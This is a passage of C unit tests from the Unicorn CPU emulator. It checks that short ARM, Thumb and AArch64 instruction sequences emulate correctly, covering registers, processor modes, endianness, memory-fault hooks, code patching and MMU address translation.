test_arm_hflags_rebuilt(void) { // MRS r6, apsr // BIC r6, r6, #&1F // ORR r6, r6, #&10 // MSR cpsr_c, r6 // SWI OS_EnterOS // MSR cpsr_c, r6 char code[] = "\x00\x60\x0f\xe1\x1f\x60\xc6\xe3\x10\x60\x86\xe3\x06\xf0\x21" "\xe1\x16\x00\x02\xef\x06\xf0\x21\xe1"; uc_engine *uc; uint32_t r_cpsr, r_spsr, r_r13, r_r14, r_pc; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A9); r_cpsr = 0x40000013; // SVC32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_spsr = 0x40000013; OK(uc_reg_write(uc, UC_ARM_REG_SPSR, &r_spsr)); r_r13 = 0x12345678; // SP OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_r13)); r_r14 = 0x00102220; // LR OK(uc_reg_write(uc, UC_ARM_REG_R14, &r_r14)); r_cpsr = 0x40000010; // USR32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_r13 = 0x0010000; // SP OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_r13)); r_r14 = 0x0001234; // LR OK(uc_reg_write(uc, UC_ARM_REG_R14, &r_r14)); uc_assert_err( UC_ERR_EXCEPTION, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); r_cpsr = 0x60000013; OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_cpsr = 0x60000010; OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_cpsr = 0x60000013; OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); OK(uc_emu_start(uc, r_pc, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); OK(uc_reg_read(uc, UC_ARM_REG_R13, &r_r13)); OK(uc_reg_read(uc, UC_ARM_REG_R14, &r_r14)); TEST_CHECK(r_cpsr == 0x60000010); TEST_CHECK(r_r13 == 0x00010000); TEST_CHECK(r_r14 == 0x00001234); OK(uc_close(uc)); } static bool test_arm_mem_access_abort_hook_mem(uc_engine 
*uc, uc_mem_type type, uint64_t addr, int size, int64_t val, void *data) { OK(uc_reg_read(uc, UC_ARM_REG_PC, data)); return false; } static bool test_arm_mem_access_abort_hook_insn_invalid(uc_engine *uc, void *data) { OK(uc_reg_read(uc, UC_ARM_REG_PC, data)); return false; } static void test_arm_mem_access_abort(void) { // LDR r0, [r0] // Undefined instruction char code[] = "\x00\x00\x90\xe5\x00\xa0\xf0\xf7"; uc_engine *uc; uint32_t r_pc, r_r0, r_pc_in_hook; uc_hook hk, hkk; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A9); r_r0 = 0x990000; OK(uc_reg_write(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_hook_add(uc, &hk, UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED | UC_HOOK_MEM_FETCH_UNMAPPED, test_arm_mem_access_abort_hook_mem, (void *)&r_pc_in_hook, 1, 0)); OK(uc_hook_add(uc, &hkk, UC_HOOK_INSN_INVALID, test_arm_mem_access_abort_hook_insn_invalid, (void *)&r_pc_in_hook, 1, 0)); uc_assert_err(UC_ERR_READ_UNMAPPED, uc_emu_start(uc, code_start, code_start + 4, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); TEST_CHECK(r_pc == r_pc_in_hook); uc_assert_err(UC_ERR_INSN_INVALID, uc_emu_start(uc, code_start + 4, code_start + 8, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); TEST_CHECK(r_pc == r_pc_in_hook); uc_assert_err(UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, 0x900000, 0x900000 + 8, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); TEST_CHECK(r_pc == r_pc_in_hook); OK(uc_close(uc)); } static void test_arm_read_sctlr(void) { uc_engine *uc; uc_arm_cp_reg reg; OK(uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc)); // SCTLR. See arm reference. reg.cp = 15; reg.is64 = 0; reg.sec = 0; reg.crn = 1; reg.crm = 0; reg.opc1 = 0; reg.opc2 = 0; OK(uc_reg_read(uc, UC_ARM_REG_CP_REG, &reg)); TEST_CHECK((uint32_t)((reg.val >> 31) & 1) == 0); OK(uc_close(uc)); } static void test_arm_be_cpsr_sctlr(void) { uc_engine *uc; uc_arm_cp_reg reg; uint32_t cpsr; OK(uc_open(UC_ARCH_ARM, UC_MODE_BIG_ENDIAN, &uc)); OK(uc_ctl_set_cpu_model( uc, UC_CPU_ARM_1176)); // big endian code, big endian data // SCTLR. See arm reference. reg.cp = 15; reg.is64 = 0; reg.sec = 0; reg.crn = 1; reg.crm = 0; reg.opc1 = 0; reg.opc2 = 0; OK(uc_reg_read(uc, UC_ARM_REG_CP_REG, &reg)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &cpsr)); TEST_CHECK((reg.val & (1 << 7)) != 0); TEST_CHECK((cpsr & (1 << 9)) != 0); OK(uc_close(uc)); OK(uc_open(UC_ARCH_ARM, UC_MODE_ARMBE8, &uc)); OK(uc_ctl_set_cpu_model(uc, UC_CPU_ARM_CORTEX_A15)); // SCTLR. See arm reference. 
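// The fields below are the CP15 encoding of SCTLR, i.e. what
// MRC p15, 0, <Rt>, c1, c0, 0 reads (crn=1, crm=0, opc1=0, opc2=0). In BE8
// mode only the data endianness flag CPSR.E (bit 9) is set, while SCTLR.B
// (bit 7, the legacy BE-32 bit) stays clear, which is exactly what the two
// TEST_CHECKs on this instance assert.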
reg.cp = 15; reg.is64 = 0; reg.sec = 0; reg.crn = 1; reg.crm = 0; reg.opc1 = 0; reg.opc2 = 0; OK(uc_reg_read(uc, UC_ARM_REG_CP_REG, &reg)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &cpsr)); // SCTLR.B == 0 TEST_CHECK((reg.val & (1 << 7)) == 0); TEST_CHECK((cpsr & (1 << 9)) != 0); OK(uc_close(uc)); } static void test_arm_switch_endian(void) { uc_engine *uc; char code[] = "\x00\x00\x91\xe5"; // ldr r0, [r1] uint32_t r_r1 = (uint32_t)code_start; uint32_t r_r0, r_cpsr; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_R1, &r_r1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); // Little endian TEST_CHECK(r_r0 == 0xe5910000); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_cpsr |= (1 << 9); OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); // Big endian TEST_CHECK(r_r0 == 0x000091e5); OK(uc_close(uc)); } static void test_armeb_ldrb(void) { uc_engine *uc; const char test_code[] = "\xe5\xd2\x10\x00"; // ldrb r1, [r2] uint64_t data_address = 0x800000; int r1 = 0x1234; int r2 = data_address; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_BIG_ENDIAN, test_code, sizeof(test_code) - 1, UC_CPU_ARM_1176); OK(uc_mem_map(uc, data_address, 1024 * 1024, UC_PROT_ALL)); OK(uc_mem_write(uc, data_address, "\x66\x67\x68\x69", 4)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r2)); OK(uc_emu_start(uc, code_start, code_start + sizeof(test_code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R1, &r1)); TEST_CHECK(r1 == 0x66); OK(uc_close(uc)); } static void test_arm_context_save(void) { uc_engine *uc; uc_engine *uc2; char code[] = "\x83\xb0"; // sub sp, #0xc uc_context *ctx; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_R5); OK(uc_context_alloc(uc, &ctx)); OK(uc_context_save(uc, ctx)); OK(uc_context_restore(uc, ctx)); uc_common_setup(&uc2, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A7); // Note the different CPU model OK(uc_context_restore(uc2, ctx)); OK(uc_context_free(ctx)); OK(uc_close(uc)); OK(uc_close(uc2)); } static void test_arm_thumb2(void) { uc_engine *uc; // MOVS R0, #0x24 // AND.W R0, R0, #4 char code[] = "\x24\x20\x00\xF0\x04\x00"; uint32_t r_r0; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_LITTLE_ENDIAN, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_R5); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); TEST_CHECK(r_r0 == 0x4); OK(uc_close(uc)); } static void test_armeb_be32_thumb2(void) { uc_engine *uc; // MOVS R0, #0x24 // AND.W R0, R0, #4 char code[] = "\x20\x24\xF0\x00\x00\x04"; uint32_t r_r0; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_R5); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); TEST_CHECK(r_r0 == 0x4); OK(uc_close(uc)); } TEST_LIST = {{"test_arm_nop", test_arm_nop}, {"test_arm_thumb_sub", test_arm_thumb_sub}, {"test_armeb_sub", test_armeb_sub}, {"test_armeb_be8_sub", test_armeb_be8_sub}, {"test_arm_thumbeb_sub", test_arm_thumbeb_sub}, {"test_arm_thumb_ite", test_arm_thumb_ite}, {"test_arm_m_thumb_mrs", test_arm_m_thumb_mrs}, {"test_arm_m_control", test_arm_m_control}, {"test_arm_m_exc_return", test_arm_m_exc_return}, {"test_arm_und32_to_svc32", 
test_arm_und32_to_svc32}, {"test_arm_usr32_to_svc32", test_arm_usr32_to_svc32}, {"test_arm_v8", test_arm_v8}, {"test_arm_thumb_smlabb", test_arm_thumb_smlabb}, {"test_arm_not_allow_privilege_escalation", test_arm_not_allow_privilege_escalation}, {"test_arm_mrc", test_arm_mrc}, {"test_arm_hflags_rebuilt", test_arm_hflags_rebuilt}, {"test_arm_mem_access_abort", test_arm_mem_access_abort}, {"test_arm_read_sctlr", test_arm_read_sctlr}, {"test_arm_be_cpsr_sctlr", test_arm_be_cpsr_sctlr}, {"test_arm_switch_endian", test_arm_switch_endian}, {"test_armeb_ldrb", test_armeb_ldrb}, {"test_arm_context_save", test_arm_context_save}, {"test_arm_thumb2", test_arm_thumb2}, {"test_armeb_be32_thumb2", test_armeb_be32_thumb2}, {NULL, NULL}};
unicorn-2.1.1/tests/unit/test_arm64.c
#include "acutest.h" #include "unicorn/unicorn.h" #include "unicorn_test.h" #include <stdbool.h> #include <stdint.h> #include <stdio.h> const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size, uc_cpu_arm64 cpu) { OK(uc_open(arch, mode, uc)); OK(uc_ctl_set_cpu_model(*uc, cpu)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_arm64_until(void) { uc_engine *uc; char code[] = "\x30\x00\x80\xd2\x11\x04\x80\xd2\x9c\x23\x00\x91"; /* mov x16, #1 mov x17, #0x20 add x28, x28, 8 */ uint64_t r_x16 = 0x12341234; uint64_t r_x17 = 0x78907890; uint64_t r_pc = 0x00000000; uint64_t r_x28 = 0x12341234; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); // initialize machine registers OK(uc_reg_write(uc, UC_ARM64_REG_X16, &r_x16)); OK(uc_reg_write(uc, UC_ARM64_REG_X17, &r_x17)); OK(uc_reg_write(uc, UC_ARM64_REG_X28, &r_x28)); // emulate the three instructions OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 3)); OK(uc_reg_read(uc, UC_ARM64_REG_X16, &r_x16)); OK(uc_reg_read(uc, UC_ARM64_REG_X17, &r_x17)); OK(uc_reg_read(uc, UC_ARM64_REG_X28, &r_x28)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); TEST_CHECK(r_x16 == 0x1); TEST_CHECK(r_x17 == 0x20); TEST_CHECK(r_x28 == 0x1234123c); TEST_CHECK(r_pc == (code_start + sizeof(code) - 1)); OK(uc_close(uc)); } static void test_arm64_code_patching(void) { uc_engine *uc; char code[] = "\x00\x04\x00\x11"; // add w0, w0, 0x1 uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); // zero out x0 uint64_t r_x0 = 0x0; OK(uc_reg_write(uc, UC_ARM64_REG_X0, &r_x0)); // emulate the instruction OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); // check value OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); TEST_CHECK(r_x0 == 0x1); // patch instruction char patch_code[] = "\x00\xfc\x1f\x11"; // add w0, w0, 0x7FF OK(uc_mem_write(uc, code_start, patch_code, sizeof(patch_code) - 1)); // zero out x0 r_x0 = 0x0; OK(uc_reg_write(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_emu_start(uc, code_start, code_start + 
sizeof(patch_code) - 1, 0, 0)); // check value OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); TEST_CHECK(r_x0 != 0x1); TEST_CHECK(r_x0 == 0x7ff); OK(uc_close(uc)); } // Need to flush the cache before running the emulation after patching static void test_arm64_code_patching_count(void) { uc_engine *uc; char code[] = "\x00\x04\x00\x11"; // add w0, w0, 0x1 uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); // zero out x0 uint64_t r_x0 = 0x0; OK(uc_reg_write(uc, UC_ARM64_REG_X0, &r_x0)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 1)); // check value OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); TEST_CHECK(r_x0 == 0x1); // patch instruction char patch_code[] = "\x00\xfc\x1f\x11"; // add w0, w0, 0x7FF OK(uc_mem_write(uc, code_start, patch_code, sizeof(patch_code) - 1)); OK(uc_ctl_remove_cache(uc, code_start, code_start + sizeof(patch_code) - 1)); // zero out x0 r_x0 = 0x0; OK(uc_reg_write(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_emu_start(uc, code_start, -1, 0, 1)); // check value OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); TEST_CHECK(r_x0 != 0x1); TEST_CHECK(r_x0 == 0x7ff); OK(uc_close(uc)); } static void test_arm64_v8_pac(void) { uc_engine *uc; char code[] = "\x28\xfd\xea\xc8"; // casal x10, x8, [x9] uint64_t r_x9, r_x8, mem; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_MAX); OK(uc_mem_map(uc, 0x40000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x40000, "\x00\x00\x00\x00\x00\x00\x00\x00", 8)); r_x9 = 0x40000; OK(uc_reg_write(uc, UC_ARM64_REG_X9, &r_x9)); r_x8 = 0xdeadbeafdeadbeaf; OK(uc_reg_write(uc, UC_ARM64_REG_X8, &r_x8)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0x40000, (void *)&mem, 8)); TEST_CHECK(LEINT64(mem) == r_x8); OK(uc_close(uc)); } static void test_arm64_read_sctlr(void) { uc_engine *uc; uc_arm64_cp_reg reg; OK(uc_open(UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM, &uc)); // SCTLR_EL1. See arm reference. 
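// The fields below give the AArch64 system-register encoding of SCTLR_EL1
// (op0=3, op1=0, CRn=1, CRm=0, op2=0), i.e. the register that
// "mrs x0, sctlr_el1" reads; the following check only assumes that the
// top bits (63:58) read back as zero on the default CPU model.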
reg.crn = 1; reg.crm = 0; reg.op0 = 0b11; reg.op1 = 0; reg.op2 = 0; OK(uc_reg_read(uc, UC_ARM64_REG_CP_REG, &reg)); TEST_CHECK((reg.val >> 58) == 0); OK(uc_close(uc)); } static uint32_t test_arm64_mrs_hook_cb(uc_engine *uc, uc_arm64_reg reg, const uc_arm64_cp_reg *cp_reg) { uint64_t r_x2 = 0x114514; OK(uc_reg_write(uc, reg, &r_x2)); // Skip return 1; } static void test_arm64_mrs_hook(void) { uc_engine *uc; uc_hook hk; uint64_t r_x2; // mrs x2, tpidrro_el0 char code[] = "\x62\xd0\x3b\xd5"; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); OK(uc_hook_add(uc, &hk, UC_HOOK_INSN, (void *)test_arm64_mrs_hook_cb, NULL, 1, 0, UC_ARM64_INS_MRS)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_X2, &r_x2)); TEST_CHECK(r_x2 == 0x114514); OK(uc_hook_del(uc, hk)); OK(uc_close(uc)); } static bool test_arm64_correct_address_in_small_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_x0 = 0x0; uint64_t r_pc = 0x0; OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); TEST_CHECK(r_x0 == 0x7F00); TEST_CHECK(r_pc == 0x7F00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7F00); return false; } static void test_arm64_correct_address_in_small_jump_hook(void) { uc_engine *uc; // mov x0, 0x7F00; // br x0 char code[] = "\x00\xe0\x8f\xd2\x00\x00\x1f\xd6"; uint64_t r_x0 = 0x0; uint64_t r_pc = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_arm64_correct_address_in_small_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); TEST_CHECK(r_x0 == 0x7F00); TEST_CHECK(r_pc == 0x7F00); OK(uc_close(uc)); } static bool test_arm64_correct_address_in_long_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_x0 = 0x0; uint64_t r_pc = 0x0; OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); TEST_CHECK(r_x0 == 0x7FFFFFFFFFFFFF00); TEST_CHECK(r_pc == 0x7FFFFFFFFFFFFF00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7FFFFFFFFFFFFF00); return false; } static void test_arm64_correct_address_in_long_jump_hook(void) { uc_engine *uc; // mov x0, 0x7FFFFFFFFFFFFF00; // br x0 char code[] = "\xe0\xdb\x78\xb2\x00\x00\x1f\xd6"; uint64_t r_x0 = 0x0; uint64_t r_pc = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_arm64_correct_address_in_long_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); TEST_CHECK(r_x0 == 0x7FFFFFFFFFFFFF00); TEST_CHECK(r_pc == 0x7FFFFFFFFFFFFF00); OK(uc_close(uc)); } static void test_arm64_block_sync_pc_cb(uc_engine *uc, uint64_t addr, uint32_t size, void *data) { uint64_t val = code_start; bool first = *(bool *)data; if (first) { OK(uc_reg_write(uc, UC_ARM64_REG_PC, (void *)&val)); *(bool *)data = false; } } static void 
test_arm64_block_sync_pc(void) { uc_engine *uc; // add x0, x0, #1234;bl t;t:mov x1, #5678; const char code[] = "\x00\x48\x13\x91\x01\x00\x00\x94\xc1\xc5\x82\xd2"; uc_hook hk; uint64_t x0; bool data = true; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); OK(uc_hook_add(uc, &hk, UC_HOOK_BLOCK, test_arm64_block_sync_pc_cb, (void *)&data, code_start + 8, code_start + 12)); x0 = 0; OK(uc_reg_write(uc, UC_ARM64_REG_X0, (void *)&x0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, (void *)&x0)); TEST_CHECK(x0 == (1234 * 2)); OK(uc_hook_del(uc, hk)); OK(uc_close(uc)); } static bool test_arm64_block_invalid_mem_read_write_sync_cb(uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { return 0; } static void test_arm64_block_invalid_mem_read_write_sync(void) { uc_engine *uc; // mov x0, #1 // mov x1, #2 // ldr x0, [x1] const char code[] = "\x20\x00\x80\xd2\x41\x00\x80\xd2\x20\x00\x40\xf9"; uint64_t r_pc, r_x0, r_x1; uc_hook hk; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); OK(uc_hook_add(uc, &hk, UC_HOOK_MEM_READ, test_arm64_block_invalid_mem_read_write_sync_cb, NULL, 1, 0)); uc_assert_err( UC_ERR_READ_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_reg_read(uc, UC_ARM64_REG_X1, &r_x1)); TEST_CHECK(r_pc == code_start + 8); TEST_CHECK(r_x0 == 1); TEST_CHECK(r_x1 == 2); OK(uc_close(uc)); } static void test_arm64_mmu(void) { uc_engine *uc; char *data; char tlbe[8]; uint64_t x0, x1, x2; /* * Not exact the binary, but aarch64-linux-gnu-as generate this code and reference sometimes data after ttb0_base. * // Read data from physical address * ldr X0, =0x40000000 * ldr X1, [X0] * // Initialize translation table control registers * ldr X0, =0x180803F20 * msr TCR_EL1, X0 * ldr X0, =0xFFFFFFFF * msr MAIR_EL1, X0 * // Set translation table * adr X0, ttb0_base * msr TTBR0_EL1, X0 * // Enable caches and the MMU * mrs X0, SCTLR_EL1 * orr X0, X0, #(0x1 << 2) // The C bit (data cache). * orr X0, X0, #(0x1 << 12) // The I bit (instruction cache) * orr X0, X0, #0x1 // The M bit (MMU). * msr SCTLR_EL1, X0 * dsb SY * isb * // Read the same memory area through virtual address * ldr X0, =0x80000000 * ldr X2, [X0] * * // Stop * b . 
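 * Reading of the test body below (not part of the original comment): with
 * TCR_EL1 = 0x180803F20 (T0SZ = 32, 4 KB granule) translation starts at
 * level 1 with 1 GB block descriptors, TTBR0_EL1 points at the entries
 * written to 0x1000, and the entry for VA 0x80000000 is the block
 * descriptor 0x40000741, so the second load is expected to return the
 * same 0x44-filled data that was first read through PA 0x40000000.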
*/ char code[] = "\x00\x81\x00\x58\x01\x00\x40\xf9\x00\x81\x00\x58\x40\x20\x18" "\xd5\x00\x81\x00\x58\x00\xa2\x18\xd5\x40\x7f\x00\x10\x00\x20" "\x18\xd5\x00\x10\x38\xd5\x00\x00\x7e\xb2\x00\x00\x74\xb2\x00" "\x00\x40\xb2\x00\x10\x18\xd5\x9f\x3f\x03\xd5\xdf\x3f\x03\xd5" "\xe0\x7f\x00\x58\x02\x00\x40\xf9\x00\x00\x00\x14\x1f\x20\x03" "\xd5\x1f\x20\x03\xd5\x1F\x20\x03\xD5\x1F\x20\x03\xD5"; data = malloc(0x1000); TEST_CHECK(data != NULL); OK(uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc)); OK(uc_ctl_tlb_mode(uc, UC_TLB_CPU)); OK(uc_mem_map(uc, 0, 0x2000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0, code, sizeof(code) - 1)); // generate tlb entries tlbe[0] = 0x41; tlbe[1] = 0x07; tlbe[2] = 0; tlbe[3] = 0; tlbe[4] = 0; tlbe[5] = 0; tlbe[6] = 0; tlbe[7] = 0; OK(uc_mem_write(uc, 0x1000, tlbe, sizeof(tlbe))); tlbe[3] = 0x40; OK(uc_mem_write(uc, 0x1008, tlbe, sizeof(tlbe))); OK(uc_mem_write(uc, 0x1010, tlbe, sizeof(tlbe))); OK(uc_mem_write(uc, 0x1018, tlbe, sizeof(tlbe))); // mentioned data referenced by the asm generated my aarch64-linux-gnu-as tlbe[0] = 0; tlbe[1] = 0; OK(uc_mem_write(uc, 0x1020, tlbe, sizeof(tlbe))); tlbe[0] = 0x20; tlbe[1] = 0x3f; tlbe[2] = 0x80; tlbe[3] = 0x80; tlbe[4] = 0x1; OK(uc_mem_write(uc, 0x1028, tlbe, sizeof(tlbe))); tlbe[0] = 0xff; tlbe[1] = 0xff; tlbe[2] = 0xff; tlbe[3] = 0xff; tlbe[4] = 0x00; OK(uc_mem_write(uc, 0x1030, tlbe, sizeof(tlbe))); tlbe[0] = 0x00; tlbe[1] = 0x00; tlbe[2] = 0x00; tlbe[3] = 0x80; OK(uc_mem_write(uc, 0x1038, tlbe, sizeof(tlbe))); for (size_t i = 0; i < 0x1000; i++) { data[i] = 0x44; } OK(uc_mem_map_ptr(uc, 0x40000000, 0x1000, UC_PROT_READ, data)); OK(uc_emu_start(uc, 0, 0x44, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &x0)); OK(uc_reg_read(uc, UC_ARM64_REG_X1, &x1)); OK(uc_reg_read(uc, UC_ARM64_REG_X2, &x2)); TEST_CHECK(x0 == 0x80000000); TEST_CHECK(x1 == 0x4444444444444444); TEST_CHECK(x2 == 0x4444444444444444); free(data); } static void test_arm64_pc_wrap(void) { uc_engine *uc; // add x1 x2 char add_x1_x2[] = "\x20\x00\x02\x8b"; // add x1 x3 char add_x1_x3[] = "\x20\x00\x03\x8b"; uint64_t x0, x1, x2, x3; uint64_t pc = 0xFFFFFFFFFFFFFFFCULL; uint64_t page = 0xFFFFFFFFFFFFF000ULL; OK(uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc)); OK(uc_mem_map(uc, page, 4096, UC_PROT_READ | UC_PROT_EXEC)); OK(uc_mem_write(uc, pc, add_x1_x2, sizeof(add_x1_x2) - 1)); x1 = 1; x2 = 2; OK(uc_reg_write(uc, UC_ARM64_REG_X1, &x1)); OK(uc_reg_write(uc, UC_ARM64_REG_X2, &x2)); OK(uc_emu_start(uc, pc, pc + 4, 0, 1)); OK(uc_mem_unmap(uc, page, 4096)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &x0)); TEST_CHECK((x0 == 1 + 2)); OK(uc_mem_map(uc, page, 4096, UC_PROT_READ | UC_PROT_EXEC)); OK(uc_mem_write(uc, pc, add_x1_x3, sizeof(add_x1_x3) - 1)); x1 = 5; x2 = 0; x3 = 5; OK(uc_reg_write(uc, UC_ARM64_REG_X1, &x1)); OK(uc_reg_write(uc, UC_ARM64_REG_X2, &x2)); OK(uc_reg_write(uc, UC_ARM64_REG_X3, &x3)); OK(uc_emu_start(uc, pc, pc + 4, 0, 1)); OK(uc_mem_unmap(uc, page, 4096)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &x0)); TEST_CHECK((x0 == 5 + 5)); OK(uc_close(uc)); } TEST_LIST = {{"test_arm64_until", test_arm64_until}, {"test_arm64_code_patching", test_arm64_code_patching}, {"test_arm64_code_patching_count", test_arm64_code_patching_count}, {"test_arm64_v8_pac", test_arm64_v8_pac}, {"test_arm64_read_sctlr", test_arm64_read_sctlr}, {"test_arm64_mrs_hook", test_arm64_mrs_hook}, {"test_arm64_correct_address_in_small_jump_hook", test_arm64_correct_address_in_small_jump_hook}, {"test_arm64_correct_address_in_long_jump_hook", test_arm64_correct_address_in_long_jump_hook}, {"test_arm64_block_sync_pc", 
test_arm64_block_sync_pc}, {"test_arm64_block_invalid_mem_read_write_sync", test_arm64_block_invalid_mem_read_write_sync}, {"test_arm64_mmu", test_arm64_mmu}, {"test_arm64_pc_wrap", test_arm64_pc_wrap}, {NULL, NULL}};
unicorn-2.1.1/tests/unit/test_ctl.c
